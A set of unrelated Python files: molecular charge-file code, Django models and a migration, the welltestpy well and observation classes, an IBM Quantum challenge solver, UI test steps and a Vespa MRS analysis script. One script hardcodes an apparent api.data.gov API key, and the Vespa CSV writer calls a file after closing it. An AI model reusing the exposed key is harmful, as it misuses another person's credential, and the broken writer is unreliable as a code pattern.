res_charge = float(atom.group(8))
else:
res_charge += float(atom.group(8))
old_res = res
if np.abs(np.round(total_charge, 6)) % 1 != 0:
logger.warning(f'Total charge is not integer: {total_charge}!')
else:
logger.info(f'Total charge: {total_charge:.2f}')
xyzr_file = open(xyzr_name, "w")
xyzr_file.write(xyzrfile_content)
xyzr_file.close()
logger.info(f"xyzr file generated from file {pqr_file}")
return xyzr_name
def protonated(pdb_file):
with open(pdb_file, 'r') as f:
content = f.read()
re_hydrogen = re.compile(
"ATOM\s{2}([0-9\s]{5})\s(H[A-Z0-9\s]{3}|\sH[A-Z0-9\s]{2}).*")
result = re_hydrogen.findall(content, re.MULTILINE)
if result:
return True
else:
return False
|
# Generated by Django 2.1.4 on 2019-02-03 00:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('web', '0035_auto_20190201_2156'),
('elections', '0024_auto_20190202_2353'),
]
operations = [
migrations.AddField(
model_name='debates',
name='municipality',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='web.Municipality'),
preserve_default=False,
),
]
|
# -*- coding: utf-8 -*-
"""
welltestpy subpackage providing flow datastructures for variables.
.. currentmodule:: welltestpy.data.varlib
The following classes and functions are provided
.. autosummary::
Variable
TimeVar
HeadVar
TemporalVar
CoordinatesVar
Observation
StdyObs
DrawdownObs
StdyHeadObs
TimeSeries
Well
"""
from copy import deepcopy as dcopy
import numbers
import numpy as np
from . import data_io
__all__ = [
"Variable",
"TimeVar",
"HeadVar",
"TemporalVar",
"CoordinatesVar",
"Observation",
"StdyObs",
"DrawdownObs",
"StdyHeadObs",
"TimeSeries",
"Well",
]
class Variable:
"""Class for a variable.
This is a class for a physical variable which is either a scalar or an
array.
It has a name, a value, a symbol, a unit and a descrition string.
Parameters
----------
name : :class:`str`
Name of the Variable.
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
symbole : :class:`str`, optional
Name of the Variable. Default: ``"x"``
units : :class:`str`, optional
Units of the Variable. Default: ``"-"``
description : :class:`str`, optional
Description of the Variable. Default: ``"no description"``
"""
def __init__(
self, name, value, symbol="x", units="-", description="no description"
):
self.name = data_io._formstr(name)
self.__value = None
self.value = value
self.symbol = str(symbol)
self.units = str(units)
self.description = str(description)
def __call__(self, value=None):
"""Call a variable.
Here you can set a new value or you can get the value of the variable.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`,
optional
Value of the Variable. Default: ``None``
Returns
-------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
"""
if value is not None:
self.value = value
return self.value
@property
def info(self):
""":class:`str`: Info about the Variable."""
info = ""
info += " Variable-name: " + str(self.name) + "\n"
info += " -Value: " + str(self.value) + "\n"
info += " -Symbol: " + str(self.symbol) + "\n"
info += " -Units: " + str(self.units) + "\n"
info += " -Description: " + str(self.description) + "\n"
return info
@property
def scalar(self):
""":class:`bool`: State if the variable is of scalar type."""
return np.isscalar(self.__value)
@property
def label(self):
""":class:`str`: String containing: ``symbol in units``."""
return f"{self.symbol} in {self.units}"
@property
def value(self):
""":class:`int` or :class:`float` or :class:`numpy.ndarray`: Value."""
return self.__value
@value.setter
def value(self, value):
if issubclass(np.asanyarray(value).dtype.type, numbers.Real):
if np.ndim(np.squeeze(value)) == 0:
self.__value = float(np.squeeze(value))
else:
self.__value = np.squeeze(np.array(value, dtype=float))
elif issubclass(np.asanyarray(value).dtype.type, numbers.Integral):
if np.ndim(np.squeeze(value)) == 0:
self.__value = int(np.squeeze(value))
else:
self.__value = np.squeeze(np.array(value, dtype=int))
else:
raise ValueError("Variable: 'value' is neither integer nor float")
def __repr__(self):
"""Representation."""
return f"{self.name} {self.symbol}: {self.value} {self.units}"
def __str__(self):
"""Representation."""
return f"{self.name} {self.label}"
def save(self, path="", name=None):
"""Save a variable to file.
This writes the variable to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Var_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".var"``.
"""
return data_io.save_var(self, path, name)
class TimeVar(Variable):
"""Variable class special for time series.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
symbole : :class:`str`, optional
Name of the Variable. Default: ``"t"``
units : :class:`str`, optional
Units of the Variable. Default: ``"s"``
description : :class:`str`, optional
Description of the Variable. Default: ``"time given in seconds"``
Notes
-----
Here the variable should be at most 1 dimensional and the name is fix set
to ``"time"``.
"""
def __init__(
self, value, symbol="t", units="s", description="time given in seconds"
):
super().__init__("time", value, symbol, units, description)
if np.ndim(self.value) > 1:
raise ValueError(
"TimeVar: 'time' should have at most one dimension"
)
class HeadVar(Variable):
"""
Variable class special for groundwater head.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Value of the Variable.
symbole : :class:`str`, optional
Name of the Variable. Default: ``"h"``
units : :class:`str`, optional
Units of the Variable. Default: ``"m"``
description : :class:`str`, optional
Description of the Variable. Default: ``"head given in meters"``
Notes
-----
Here the variable name is fix set to ``"head"``.
"""
def __init__(
self, value, symbol="h", units="m", description="head given in meters"
):
super().__init__("head", value, symbol, units, description)
class TemporalVar(Variable):
"""
Variable class for a temporal variable.
Parameters
----------
value : :class:`int` or :class:`float` or :class:`numpy.ndarray`,
optional
Value of the Variable. Default: ``0.0``
"""
def __init__(self, value=0.0):
super().__init__("temporal", value, description="temporal variable")
class CoordinatesVar(Variable):
"""Variable class special for coordinates.
Parameters
----------
lat : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Lateral values of the coordinates.
lon : :class:`int` or :class:`float` or :class:`numpy.ndarray`
Longitutional values of the coordinates.
symbole : :class:`str`, optional
Name of the Variable. Default: ``"[Lat,Lon]"``
units : :class:`str`, optional
Units of the Variable. Default: ``"[deg,deg]"``
description : :class:`str`, optional
Description of the Variable. Default: ``"Coordinates given in
degree-North and degree-East"``
Notes
-----
Here the variable name is fix set to ``"coordinates"``.
``lat`` and ``lon`` should have the same shape.
"""
def __init__(
self,
lat,
lon,
symbol="[Lat,Lon]",
units="[deg,deg]",
description="Coordinates given in degree-North and degree-East",
):
ilat = np.array(np.squeeze(lat), ndmin=1)
ilon = np.array(np.squeeze(lon), ndmin=1)
if (
len(ilat.shape) != 1
or len(ilon.shape) != 1
or ilat.shape != ilon.shape
):
raise ValueError(
"CoordinatesVar: 'lat' and 'lon' should have "
"same quantity and should be given as lists"
)
value = np.array([ilat, ilon]).T
super().__init__("coordinates", value, symbol, units, description)
class Observation:
"""
Class for a observation.
This is a class for time-dependent observations.
It has a name and a description.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Name of the Variable. Default: ``"x"``
time : :class:`Variable`
Value of the Variable.
description : :class:`str`, optional
Description of the Variable. Default: ``"Observation"``
"""
def __init__(
self, name, observation, time=None, description="Observation"
):
self.__it = None
self.__itfinished = None
self._time = None
self._observation = None
self.name = data_io._formstr(name)
self.description = str(description)
self._setobservation(observation)
self._settime(time)
self._checkshape()
def __call__(self, observation=None, time=None):
"""Call a variable.
Here you can set a new value or you can get the value of the variable.
Parameters
----------
observation : scalar, :class:`numpy.ndarray`, :class:`Variable`, optional
New Value for observation.
Default: ``"None"``
time : scalar, :class:`numpy.ndarray`, :class:`Variable`, optional
New Value for time.
Default: ``"None"``
Returns
-------
[:class:`tuple` of] :class:`int` or :class:`float`
or :class:`numpy.ndarray`
``(time, observation)`` or ``observation``.
"""
if observation is not None:
self._setobservation(observation)
if time is not None:
self._settime(time)
if observation is not None or time is not None:
self._checkshape()
return self.value
def __repr__(self):
"""Representation."""
return f"Observation '{self.name}' {self.label}"
def __str__(self):
"""Representation."""
return self.__repr__()
@property
def labels(self):
"""[:class:`tuple` of] :class:`str`: ``symbol in units``."""
if self.state == "transient":
return self._time.label, self._observation.label
return self._observation.label
@property
def label(self):
"""[:class:`tuple` of] :class:`str`: ``symbol in units``."""
return self.labels
@property
def info(self):
"""Get information about the observation.
Here you can display information about the observation.
"""
info = ""
info += "Observation-name: " + str(self.name) + "\n"
info += " -Description: " + str(self.description) + "\n"
info += " -Kind: " + str(self.kind) + "\n"
info += " -State: " + str(self.state) + "\n"
if self.state == "transient":
info += " --- \n"
info += self._time.info + "\n"
info += " --- \n"
info += self._observation.info + "\n"
return info
@property
def value(self):
"""
Value of the Observation.
[:class:`tuple` of] :class:`int` or :class:`float`
or :class:`numpy.ndarray`
"""
if self.state == "transient":
return self.observation, self.time
return self.observation
@property
def state(self):
"""
:class:`str`: String containing state of the observation.
Either ``"steady"`` or ``"transient"``.
"""
return "steady" if self._time is None else "transient"
@property
def kind(self):
""":class:`str`: name of the observation variable."""
return self._observation.name
@property
def time(self):
"""
Time values of the observation.
:class:`int` or :class:`float` or :class:`numpy.ndarray`
"""
return self._time.value if self.state == "transient" else None
@time.setter
def time(self, time):
self._settime(time)
self._checkshape()
@time.deleter
def time(self):
self._time = None
@property
def observation(self):
"""
Observed values of the observation.
:class:`int` or :class:`float` or :class:`numpy.ndarray`
"""
return self._observation.value
@observation.setter
def observation(self, observation):
self._setobservation(observation)
self._checkshape()
@property
def units(self):
"""[:class:`tuple` of] :class:`str`: units of the observation."""
if self.state == "steady":
return self._observation.units
return f"{self._time.units}, {self._observation.units}"
def reshape(self):
"""Reshape observations to flat array."""
if self.state == "transient":
tmp = len(np.shape(self.time))
self._settime(np.reshape(self.time, -1))
shp = np.shape(self.time) + np.shape(self.observation)[tmp:]
self._setobservation(np.reshape(self.observation, shp))
def _settime(self, time):
if isinstance(time, Variable):
self._time = dcopy(time)
elif time is None:
self._time = None
elif self._time is None:
self._time = TimeVar(time)
else:
self._time(time)
def _setobservation(self, observation):
if isinstance(observation, Variable):
self._observation = dcopy(observation)
elif observation is None:
self._observation = None
else:
self._observation(observation)
def _checkshape(self):
if self.state == "transient" and (
np.shape(self.time)
!= np.shape(self.observation)[: len(np.shape(self.time))]
):
raise ValueError(
"Observation: 'observation' has a shape-mismatch with 'time'"
)
def __iter__(self):
"""Iterate over Observations."""
if self.state == "transient":
self.__it = np.nditer(self.time, flags=["multi_index"])
else:
self.__itfinished = False
return self
def __next__(self):
"""Iterate through observations."""
if self.state == "transient":
if self.__it.finished:
raise StopIteration
ret = (
self.__it[0].item(),
self.observation[self.__it.multi_index],
)
self.__it.iternext()
else:
if self.__itfinished:
raise StopIteration
ret = self.observation
self.__itfinished = True
return ret
def save(self, path="", name=None):
"""Save an observation to file.
This writes the observation to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Obs_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".obs"``.
"""
return data_io.save_obs(self, path, name)
class StdyObs(Observation):
"""
Observation class special for steady observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Name of the Variable. Default: ``"x"``
description : :class:`str`, optional
Description of the Variable. Default: ``"Steady observation"``
"""
def __init__(self, name, observation, description="Steady observation"):
super().__init__(name, observation, None, description)
def _settime(self, time):
"""For steady observations, this raises a ``ValueError``."""
if time is not None:
raise ValueError("Observation: 'time' not allowed in steady-state")
class TimeSeries(Observation):
"""
Time series observation.
Parameters
----------
name : :class:`str`
Name of the Variable.
values : :class:`Variable`
Values of the time-series.
time : :class:`Variable`
Time points of the time-series.
description : :class:`str`, optional
Description of the Variable. Default: ``"Timeseries."``
"""
def __init__(self, name, values, time, description="Timeseries."):
if not isinstance(time, Variable):
time = TimeVar(time)
if not isinstance(values, Variable):
values = Variable(name, values, description=description)
super().__init__(name, values, time, description)
class DrawdownObs(Observation):
"""
Observation class special for drawdown observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Observation.
time : :class:`Variable`
Time points of observation.
description : :class:`str`, optional
Description of the Variable. Default: ``"Drawdown observation"``
"""
def __init__(
self, name, observation, time, description="Drawdown observation"
):
if not isinstance(time, Variable):
time = TimeVar(time)
if not isinstance(observation, Variable):
observation = HeadVar(observation)
super().__init__(name, observation, time, description)
class StdyHeadObs(Observation):
"""
Observation class special for steady drawdown observations.
Parameters
----------
name : :class:`str`
Name of the Variable.
observation : :class:`Variable`
Observation.
description : :class:`str`, optional
Description of the Variable. Default: ``"Steady observation"``
"""
def __init__(
self,
name,
observation,
description="Steady State Drawdown observation",
):
if not isinstance(observation, Variable):
observation = HeadVar(observation)
super().__init__(name, observation, None, description)
def _settime(self, time):
"""For steady observations, this raises a ``ValueError``."""
if time is not None:
raise ValueError("Observation: 'time' not allowed in steady-state")
class Well:
"""Class for a pumping-/observation-well.
This is a class for a well within a aquifer-testing campaign.
It has a name, a radius, coordinates and a depth.
Parameters
----------
name : :class:`str`
Name of the Variable.
radius : :class:`Variable` or :class:`float`
Value of the Variable.
coordinates : :class:`Variable` or :class:`numpy.ndarray`
Value of the Variable.
welldepth : :class:`Variable` or :class:`float`, optional
Depth of the well (in saturated zone). Default: 1.0
aquiferdepth : :class:`Variable` or :class:`float`, optional
Aquifer depth at the well (saturated zone). Defaults to welldepth.
Default: ``"None"``
screensize : :class:`Variable` or :class:`float`, optional
Size of the screen at the well. Defaults to 0.0.
Default: ``"None"``
Notes
-----
You can calculate the distance between two wells ``w1`` and ``w2`` by
simply calculating the difference ``w1 - w2``.
"""
def __init__(
self,
name,
radius,
coordinates,
welldepth=1.0,
aquiferdepth=None,
screensize=None,
):
self._radius = None
self._coordinates = None
self._welldepth = None
self._aquiferdepth = None
self._screensize = None
self.name = data_io._formstr(name)
self.wellradius = radius
self.coordinates = coordinates
self.welldepth = welldepth
self.aquiferdepth = aquiferdepth
self.screensize = screensize
@property
def info(self):
"""Get information about the variable.
Here you can display information about the variable.
"""
info = ""
info += "----\n"
info += "Well-name: " + str(self.name) + "\n"
info += "--\n"
info += self._radius.info + "\n"
info += self.coordinates.info + "\n"
info += self._welldepth.info + "\n"
info += self._aquiferdepth.info + "\n"
info += self._screensize.info + "\n"
info += "----\n"
return info
@property
def radius(self):
""":class:`float`: Radius of the well."""
return self._radius.value
@property
def wellradius(self):
""":class:`Variable`: Radius variable of the well."""
return self._radius
@wellradius.setter
def wellradius(self, radius):
if isinstance(radius, Variable):
self._radius = dcopy(radius)
elif self._radius is None:
self._radius = Variable(
"radius",
float(radius),
"r",
"m",
f"Inner radius of well '{self.name}'",
)
else:
self._radius(radius)
if not self._radius.scalar:
raise ValueError("Well: 'radius' needs to be scalar")
if not self.radius > 0.0:
raise ValueError("Well: 'radius' needs to be positive")
@property
def pos(self):
""":class:`numpy.ndarray`: Position of the well."""
return self._coordinates.value
@property
def coordinates(self):
""":class:`Variable`: Coordinates variable of the well."""
return self._coordinates
@coordinates.setter
def coordinates(self, coordinates):
if isinstance(coordinates, Variable):
self._coordinates = dcopy(coordinates)
elif self._coordinates is None:
self._coordinates = Variable(
"coordinates",
coordinates,
"XY",
"m",
f"coordinates of well '{self.name}'",
)
else:
self._coordinates(coordinates)
if np.shape(self.pos) != (2,) and not np.isscalar(self.pos):
raise ValueError(
"Well: 'coordinates' should be given as "
"[x,y] values or one single distance value"
)
@property
def depth(self):
""":class:`float`: Depth of the well."""
return self._welldepth.value
@property
def welldepth(self):
""":class:`Variable`: Depth variable of the well."""
return self._welldepth
@welldepth.setter
def welldepth(self, welldepth):
if isinstance(welldepth, Variable):
self._welldepth = dcopy(welldepth)
elif self._welldepth is None:
self._welldepth = Variable(
"welldepth",
float(welldepth),
"L_w",
"m",
f"depth of well '{self.name}'",
)
else:
self._welldepth(welldepth)
if not self._welldepth.scalar:
raise ValueError("Well: 'welldepth' needs to be scalar")
if not self.depth > 0.0:
raise ValueError("Well: 'welldepth' needs to be positive")
@property
def aquifer(self):
""":class:`float`: Aquifer depth at the well."""
return self._aquiferdepth.value
@property
def aquiferdepth(self):
""":class:`Variable`: Aquifer depth at the well."""
return self._aquiferdepth
@aquiferdepth.setter
def aquiferdepth(self, aquiferdepth):
if isinstance(aquiferdepth, Variable):
self._aquiferdepth = dcopy(aquiferdepth)
elif self._aquiferdepth is None:
self._aquiferdepth = Variable(
"aquiferdepth",
self.depth if aquiferdepth is None else float(aquiferdepth),
"L_a",
self.welldepth.units,
f"aquifer depth at well '{self.name}'",
)
else:
self._aquiferdepth(aquiferdepth)
if not self._aquiferdepth.scalar:
raise ValueError("Well: 'aquiferdepth' needs to be scalar")
if not self.aquifer > 0.0:
raise ValueError("Well: 'aquiferdepth' needs to be positive")
@property
def is_piezometer(self):
""":class:`bool`: Whether the well is only a standpipe piezometer."""
return np.isclose(self.screen, 0)
@property
def screen(self):
""":class:`float`: Screen size at the well."""
return self._screensize.value
@property
def screensize(self):
""":class:`Variable`: Screen size at the well."""
return self._screensize
@screensize.setter
def screensize(self, screensize):
if isinstance(screensize, Variable):
self._screensize = dcopy(screensize)
elif self._screensize is None:
self._screensize = Variable(
"screensize",
0.0 if screensize is None else float(screensize),
"L_s",
self.welldepth.units,
f"screen size at well '{self.name}'",
)
else:
self._screensize(screensize)
if not self._screensize.scalar:
raise ValueError("Well: 'screensize' needs to be scalar")
if self.screen < 0.0:
raise ValueError("Well: 'screensize' needs to be non-negative")
def distance(self, well):
"""Calculate distance to the well.
Parameters
----------
well : :class:`Well` or :class:`tuple` of :class:`float`
Coordinates to calculate the distance to or another well.
"""
if isinstance(well, Well):
return np.linalg.norm(self.pos - well.pos)
try:
return np.linalg.norm(self.pos - well)
except ValueError:
raise ValueError(
"Well: the distant-well needs to be an "
"instance of Well-class "
"or a tuple of x-y coordinates "
"or a single distance value "
"and of same coordinates-type."
)
def __repr__(self):
"""Representation."""
return f"{self.name} r={self.radius} at {self._coordinates}"
def __sub__(self, well):
"""Distance between wells."""
return self.distance(well)
def __add__(self, well):
"""Distance between wells."""
return self.distance(well)
def __and__(self, well):
"""Distance between wells."""
return self.distance(well)
def __abs__(self):
"""Distance to origin."""
return np.linalg.norm(self.pos)
def save(self, path="", name=None):
"""Save a well to file.
This writes the variable to a csv file.
Parameters
----------
path : :class:`str`, optional
Path where the variable should be saved. Default: ``""``
name : :class:`str`, optional
Name of the file. If ``None``, the name will be generated by
``"Well_"+name``. Default: ``None``
Notes
-----
The file will get the suffix ``".wel"``.
"""
return data_io.save_well(self, path, name)
|
"""The Perfect Python Project."""
__version__ = "0.1.0"
|
from django.db import models
from django.contrib.auth.models import User
from minions.models import Minions_status
# Create your models here.
class Groups(models.Model):
name = models.CharField(max_length=50,unique=True)
business = models.CharField(max_length=100)
informations = models.CharField(max_length=200)
enabled = models.BooleanField(default=True)
def __unicode__(self):
return self.name
class Hosts(models.Model):
#minion = models.OneToOneField(Minions_status,related_name="%(app_label)s_%(class)s_related")
minion = models.ForeignKey(Minions_status,related_name="%(app_label)s_%(class)s_related")
name = models.CharField(max_length=50,unique=True)
business = models.CharField(max_length=100)
informations = models.CharField(max_length=200)
group = models.ForeignKey(Groups,related_name="%(app_label)s_%(class)s_related")
enabled = models.BooleanField(default=True)
def __unicode__(self):
return self.name
|
#
# https://api.data.gov/
# https://regulationsgov.github.io/developers/basics/
#
# https://stackoverflow.com/a/48030949/1832058
#
import requests
import json
import time
all_titles = ['EPA-HQ-OAR-2013-0602']
api_key = 'PB36zotwgisM02kED1vWwvf7BklqCObDGVoyssVE'
api_base='https://api.data.gov/regulations/v3/'
api_url = '{}docket.json?api_key={}&docketId='.format(api_base, api_key)
try:
for title in all_titles:
url = api_url + title
print('url:', url)
response = requests.get(url)
data = response.json()
print('--- data ---')
print(data)
print('--- keys ---')
for key in data.keys():
print('key:', key)
except Exception as ex:
print('error:', ex)
|
#!/usr/bin/env python
# coding: utf-8
# # Challenge 4c solver function for the IBM Quantum Fall Challenge 2021
# Author: Takuya Furusawa
# Score: 269940
#
# Summary of the approach:
# 1. Use the Quantum Fourier Transformation only once
# 2. Set C1 to be [0,...,0] to reduce the data_qubits
# 3. Set 1 in C2 to be 0 to reduce the data_qubits
#
# In[2]:
import numpy as np
import math
from typing import List, Union
from qiskit import QuantumCircuit,QuantumRegister, ClassicalRegister
from qiskit.circuit import Gate
from qiskit.circuit.library.standard_gates import *
from qiskit.circuit.library import QFT
def solver_function(L1: list, L2: list, C1: list, C2: list, C_max: int) -> QuantumCircuit:
# print name and score
author = 'Takuya Furusawa'
score = 269940
print(f'{author}: {score}')
#### Make the problem easier first
C_max = C_max - sum(C1) # Reduce C_max
num_of_ones = 0
for i in range(len(C1)):
C2[i]-= C1[i] # Only the difference is important
C1[i] = 0 # Set C1 = [0,...,0]
if C2[i]==1:
C2[i]=0 # Set 1 in C2 to be 0
num_of_ones +=1 # Count the number of 1 in C2
C_max -= int(num_of_ones/2) # Subtracting nothing is less but subtracting num_of_ones is too much...
c = int( math.log(C_max,2) )
if not( C_max == 2**c ):
c += 1
geta = 2**c - C_max-1
C_max = 2**c-1 # Set C_max = 2**c - 1
C1[0] += geta # the difference between the original and new C_max is added
C2[0] += geta # the difference between the original and new C_max is added
# the number of qubits representing answers
index_qubits = len(L1)
# the maximum possible total cost
max_c = sum([max(l0, l1) for l0, l1 in zip(C1, C2)])
# the number of qubits representing data values can be defined using the maximum possible total cost as follows:
data_qubits = math.ceil(math.log(max_c, 2)) if not max_c & (max_c - 1) == 0 else math.ceil(math.log(max_c, 2)) + 1
### Phase Operator ###
# return part
def phase_return(index_qubits: int, gamma: float, L1: list, L2: list, to_gate=True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qc = QuantumCircuit(qr_index)
threshold = 1
for i in range(index_qubits):
angle = L1[i]-L2[i]
if angle<-threshold:
qc.p(gamma*angle,i)
return qc.to_gate(label=" phase return ") if to_gate else qc
# penalty part
def subroutine_add_const(data_qubits: int, const: int, to_gate=True) -> Union[Gate, QuantumCircuit]:
qc = QuantumCircuit(data_qubits)
for i in range(data_qubits):
angle = const/(2**(data_qubits - i))
if not angle == int(angle):
qc.p(2*np.pi*angle, i)
return qc.to_gate(label=" [+"+str(const)+"] ") if to_gate else qc
# penalty part
def const_adder(data_qubits: int, const: int, to_gate=True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qc = QuantumCircuit(qr_data)
qc.append(subroutine_add_const(data_qubits=data_qubits,const=const),qr_data[:]) # No QFT here
return qc.to_gate(label=" [ +" + str(const) + "] ") if to_gate else qc
# penalty part
def cost_calculation(index_qubits: int, data_qubits: int, list1: list, list2: list, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qr_data = QuantumRegister(data_qubits, "data")
qc = QuantumCircuit(qr_index, qr_data)
threshold = 1
qc.append(QFT(data_qubits).to_gate(),qr_data) # QFT needs only here #! Added by Bo Yang
for i, (val1, val2) in enumerate(zip(list1, list2)):
if val2>threshold: ## Neglect val2=0 to save the cost
const_adder_2 = const_adder(data_qubits=data_qubits,const=val2).control(1)
qc.append(const_adder_2, [qr_index[i]] + qr_data[:])
if i==0:
const_adder_1 = const_adder(data_qubits=data_qubits,const=val1).control(1)
qc.x(qr_index[i])
qc.append(const_adder_1, [qr_index[i]] + qr_data[:]) # No addition of C1 except C1[0]
qc.x(qr_index[i])
qc.append(QFT(data_qubits,inverse=True).to_gate(),qr_data) # inverse QFT needs only here
return qc.to_gate(label=" Cost Calculation ") if to_gate else qc
# penalty part
def constraint_testing(data_qubits: int, C_max: int, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_data, qr_f)
# Since C_max = 2**c - 1, e.g., qr_data = xxxyyy is ok (i.e., flag=0) if all of x's are 0.
a = int(math.log(C_max,2))
qc.x(qr_data[:])
if data_qubits-a>1:
qc.mcx(qr_data[a+1:],qr_f)
qc.x(qr_f)
return qc.to_gate(label=" Constraint Testing ") if to_gate else qc
# penalty part
def penalty_dephasing(data_qubits: int, alpha: float, gamma: float, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_data, qr_f)
for i in range(data_qubits):
qc.cp(2*alpha*gamma*(2**(data_qubits)-1-2**i ),qr_f,qr_data[i])
qc.p(-2*alpha*gamma*C_max,qr_f)
return qc.to_gate(label=" Penalty Dephasing ") if to_gate else qc
# penalty part
def reinitialization(index_qubits: int, data_qubits: int, C1: list, C2: list, C_max: int, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qr_data = QuantumRegister(data_qubits, "data")
qr_f = QuantumRegister(1, "flag")
qc = QuantumCircuit(qr_index, qr_data, qr_f)
qc.append(constraint_testing(data_qubits=data_qubits,C_max=C_max,to_gate=True),qr_data[:]+qr_f[:])
qc.append(cost_calculation(index_qubits=index_qubits,data_qubits=data_qubits,list1=C1,list2=C2,to_gate=True).inverse(),qr_index[:]+qr_data[:])
return qc.to_gate(label=" Reinitialization ") if to_gate else qc
### Mixing Operator ###
def mixing_operator(index_qubits: int, beta: float, to_gate = True) -> Union[Gate, QuantumCircuit]:
qr_index = QuantumRegister(index_qubits, "index")
qc = QuantumCircuit(qr_index)
if beta>1e-5: # beta = 0 is identity so this reduces # of gates.
for i in range(index_qubits):
qc.rx(2*beta,i)
return qc.to_gate(label=" Mixing Operator ") if to_gate else qc
qr_index = QuantumRegister(index_qubits, "index") # index register
qr_data = QuantumRegister(data_qubits, "data") # data register
qr_f = QuantumRegister(1, "flag") # flag register
cr_index = ClassicalRegister(index_qubits,"c_index") # classical register storing the measurement result of index register
qc = QuantumCircuit(qr_index, qr_data, qr_f, cr_index)
### initialize the index register with uniform superposition state ###
qc.h(qr_index)
### DO NOT CHANGE THE CODE BELOW
p = 5
alpha = 1
for i in range(p):
### set fixed parameters for each round ###
beta = 1 - (i + 1) / p
gamma = (i + 1) / p
### return part ###
qc.append(phase_return(index_qubits, gamma, L1, L2), qr_index)
### step 1: cost calculation ###
qc.append(cost_calculation(index_qubits, data_qubits, C1, C2), qr_index[:] + qr_data[:])
### step 2: Constraint testing ###
qc.append(constraint_testing(data_qubits, C_max), qr_data[:] + qr_f[:])
### step 3: penalty dephasing ###
qc.append(penalty_dephasing(data_qubits, alpha, gamma), qr_data[:] + qr_f[:])
### step 4: reinitialization ###
qc.append(reinitialization(index_qubits, data_qubits, C1, C2, C_max), qr_index[:] + qr_data[:] + qr_f[:])
### mixing operator ###
qc.append(mixing_operator(index_qubits, beta), qr_index)
### measure the index ###
### since the default measurement outcome is shown in big endian, it is necessary to reverse the classical bits in order to unify the endian ###
qc.measure(qr_index, cr_index[::-1])
return qc
|
# -*- coding: utf-8 -*-
from lettuce import step, world
@step(u'Then I see the menu')
def then_i_see_the_menu(step):
menu_block = world.elem('.masthead')
assert menu_block.is_displayed()
@step(u'and I see auth block')
def and_i_see_auth_block(step):
auth_block = world.elem('.auth')
assert auth_block.is_displayed()
@step(u'and auth block contains facebook login')
def and_auth_block_contains_facebook_login(step):
auth_block = world.elem('.auth')
assert 'Login with Facebook' in auth_block.text
@step(u'and auth block contains google login')
def and_auth_block_contains_google_login(step):
auth_block = world.elem('.auth')
assert 'Login with Google' in auth_block.text
@step(u'and auth block contains my full name')
def and_auth_block_contains_my_full_name(step):
user = world.get_current_user()
auth_block = world.elem('.auth')
assert user.get_full_name() in auth_block.text
|
# Python modules
import os
import sys
# 3rd party modules
# Our modules
import vespa.analysis.util_import as util_import
SUPPORTED = ['wbnaa', 'siemens dicom']
DESC = \
"""Command line interface to process MRS data in Vespa-Analysis.
Data filename, preset file name, data type string and CSV output
file name values are all required for this command to function
properly.
Note. You may have to enclose data/preset/output strings in double
quotation marks for them to process properly if they have
spaces or other special characters embedded in them.
"""
def do_results(dataset, datafile, csvfile, verbose=False, debug=False):
"""
Some typical save type formats = 'svg' 'eps' 'pdf' 'png' 'raw' 'rgba' 'ps' 'pgf' etc.
Typical fontnames 'Consolas' 'Calibri' 'Courier New' 'Times New Roman'
minplot and maxplot are in PPM
"""
fpath, fname = os.path.split(datafile)
# Save results to CSV file --------------------------------------
if verbose: print(""" - saving results to CSV file "%s". """ % csvfile)
voxels = dataset.all_voxels
fit = dataset.blocks["fit"]
# FIXME - this fails if no Prep block, need a property at the dataset level?
measure_times = dataset.blocks["prep"].measure_time
lines = fit.results_as_csv_all_voxels_areas(voxels, fname, measure_times)
lines = [",".join(line) for line in lines]
lines = "\n".join(lines)
lines += '\n'
with open(csvfile, 'a') as f:
pass
f.write(lines)
def _open_viff(datafile):
datasets = []
filename = datafile
timestamp = ''
msg = ""
try:
importer = util_import.DatasetCliImporter(filename)
except IOError:
msg = """I can't read the file "%s".""" % filename
except SyntaxError:
msg = """The file "%s" isn't valid Vespa Interchange File Format.""" % filename
if msg:
print(msg, file=sys.stderr)
print(msg, file=sys.stdout)
sys.exit(-1)
else:
# Time to rock and roll!
dsets, timestamp = importer.go()
for item in dsets:
datasets.append(item)
if datasets:
for dataset in datasets:
if dataset.id == datasets[-1].id:
dataset.dataset_filename = filename
# dataset.filename is an attribute set only at run-time
# to maintain the name of the VIFF file that was read in
# rather than deriving a filename from the raw data
# filenames with *.xml appended. But we need to set this
# filename only for the primary dataset, not the associated
# datasets. Associated datasets will default back to their
# raw filenames if we go to save them for any reason
else:
dataset.dataset_filename = ''
return datasets, timestamp
def main():
verbose = True
# Processing of SVS_EDIT_DIFF files
STARTDIR = 'D:\\Users\\bsoher\\temp\\current\\data'
csvfile = STARTDIR+'\\_csv_output_file_metabs.txt'
